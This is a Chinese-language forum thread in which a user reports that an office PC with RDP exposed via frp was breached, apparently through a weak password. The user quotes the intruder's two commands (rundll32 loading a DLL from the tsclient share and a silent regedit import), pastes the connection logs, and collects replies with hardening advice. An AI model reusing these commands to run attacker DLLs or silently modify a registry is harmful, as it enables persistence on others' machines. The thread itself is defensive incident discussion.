V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Droog
V2EX  ›  问与答

3389 端口开了两天,就被人搞了...

  •  
  •   Droog · 2022-10-27 12:48:38 +08:00 · 3745 次点击
    这是一个创建于 795 天前的主题,其中的信息可能已经有所发展或是发生改变。

    办公室有台没用的电脑,拿来刷网课。用 frp 打洞,直接开的 3389 端口,用 mstsc 远程控制。 才开了 2 天,就被人搞进来了,应该是弱口令的问题。

    看到别人的操作记录

    请问有人知道这是操作了什么不?

    rundll32 \\tsclient\a\a.dll a
    regedit /s \\tsclient\a\r.reg
    

    frp 服务端日志

    2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:38210]
    2022/10/27 06:17:01 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:39680]
    2022/10/27 06:17:02 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:40964]
    2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:42406]
    2022/10/27 06:17:03 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:43746]
    2022/10/27 06:17:04 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:44924]
    2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:46104]
    2022/10/27 06:17:05 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:47126]
    2022/10/27 06:17:06 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:48130]
    2022/10/27 06:17:07 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [154.89.5.220:49162]
    2022/10/27 06:38:56 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:49298]
    2022/10/27 06:48:35 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.26.179.7:55213]
    2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:37643]
    2022/10/27 06:55:41 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [77.83.36.44:38109]
    2022/10/27 07:04:11 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:62334]
    2022/10/27 07:12:42 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [185.170.144.46:3172]
    2022/10/27 07:13:48 [I] [proxy.go:162] [fcd53d7a449ce30e] [rdp] get a user connection [218.15.254.218:56728]
    2022/10/27 07:16:39 [I] [control.go:309] [fcd53d7a449ce30e] control writer is closing
    
    20 条回复    2022-10-28 18:27:54 +08:00
    7zlid
        1
    7zlid  
       2022-10-27 12:49:41 +08:00 via Android
    重装系统吧
    cndns
        2
    cndns  
       2022-10-27 13:02:35 +08:00
    RDP 使用 3389 和 SSH 使用 22 的都是勇士
    Droog
        3
    Droog  
    OP
       2022-10-27 13:06:42 +08:00
    @cndns 收到教训了...
    @7zlid 估计只有这样了!
    kingpo
        4
    kingpo  
       2022-10-27 13:07:02 +08:00
    改下 3389 端口
    maskerTUI
        5
    maskerTUI  
       2022-10-27 13:09:26 +08:00
    弱口令才是真正的问题
    villivateur
        6
    villivateur  
       2022-10-27 13:09:38 +08:00   ❤️ 1
    @cndns 用标准端口没有任何问题,比如 SSH ,如果关闭密码登录,只允许 RSA 密钥登录,随便黑客怎样都不可能攻破
    flexbug
        7
    flexbug  
       2022-10-27 13:09:55 +08:00 via iPhone
    建议使用向日葵或者 todesk 不要自己创造风险
    mcluyu
        8
    mcluyu  
       2022-10-27 13:38:50 +08:00
    默认用户名(或者容易猜到的常见用户名)+ 弱口令, 至于使用什么端口根本无所谓。
    vmebeh
        9
    vmebeh  
       2022-10-27 13:40:57 +08:00 via iPhone   ❤️ 1
    套个 wireguard 回来随便用
    Ufo666
        10
    Ufo666  
       2022-10-27 15:15:29 +08:00
    @cndns 别吓我,我们公司就是 22
    Droog
        11
    Droog  
    OP
       2022-10-27 16:06:28 +08:00
    @vmebeh 我试试看。
    0x73346b757234
        12
    0x73346b757234  
       2022-10-27 17:58:31 +08:00
    黑阔用 rundll32 白加黑的方式执行了一个恶意 dll 文件,猜测是远控木马。注册表加了个一个记录也许是做了持久化。
    kongkongye
        13
    kongkongye  
       2022-10-27 18:03:19 +08:00 via iPhone
    我上次也是,用 frp 无密码暴露了 docker😂
    ungrown
        14
    ungrown  
       2022-10-27 18:32:37 +08:00 via Android
    @villivateur #6 rdp 也可以这样吗只允许密钥登录?
    zero47
        15
    zero47  
       2022-10-27 19:26:12 +08:00
    之前用凉心云搭 transmission 远程下载,每次登上去都提示密码错误次数过多,要求重启。什么端口都没用,专门有人恶意扫端口的,还是好好加密比较重要。ssh 用 22 我觉得没问题,用证书加密就好。
    mmm159357456
        16
    mmm159357456  
       2022-10-27 20:11:47 +08:00
    rdp 可以上证书验证吗?
    swulling
        17
    swulling  
       2022-10-27 20:13:33 +08:00 via iPhone
    不要暴露任何控制端口到公网
    aver4vex
        18
    aver4vex  
       2022-10-27 20:28:04 +08:00
    我现在就是软路由开 wireguard 服务。随便折腾。
    PerFectTime
        19
    PerFectTime  
       2022-10-28 10:33:52 +08:00
    VPN 连回家最安全,商业公司的软件你也不知道里面有没有 0day
    HFX3389
        20
    HFX3389  
       2022-10-28 18:27:54 +08:00
    frp 开 stcp 呗,不用普通的 tcp
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1133 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 18:19 · PVG 02:19 · LAX 10:19 · JFK 13:19
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.